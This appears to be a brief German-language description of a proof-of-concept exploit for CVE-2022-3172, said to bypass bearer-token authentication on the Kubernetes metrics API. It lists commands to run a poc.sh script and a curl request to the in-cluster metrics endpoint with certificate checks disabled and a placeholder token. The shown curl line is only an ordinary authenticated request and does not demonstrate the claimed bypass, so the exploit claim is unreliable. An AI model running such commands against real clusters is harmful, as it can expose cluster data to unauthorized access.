
Proof-of-Concept-Exploit für CVE-2022-3172, der unbefugten Zugriff auf die Kubernetes-Metrics-API über die Umgehung der Bearer-Token-Authentifizierung demonstriert.
chmod +x poc.sh
./poc.sh
curl https://kubernetes.default.svc/apis/metrics.k8s.io/v2beta1/ -k -H "Authorization: Bearer {token}"